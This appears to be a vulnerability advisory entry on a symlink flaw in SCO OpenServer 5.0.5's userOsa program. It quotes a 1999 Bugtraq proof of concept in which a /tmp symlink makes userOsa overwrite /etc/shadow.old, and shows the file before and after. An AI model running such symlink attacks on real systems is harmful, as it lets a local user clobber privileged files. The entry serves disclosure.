|
|
SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
As per Brock Tellier's original posting to Bugtraq: scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- BEFORE EXPLOIT: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old AFTER EXPLOIT (note the file size): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604> <<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# |
|
Privacy Statement |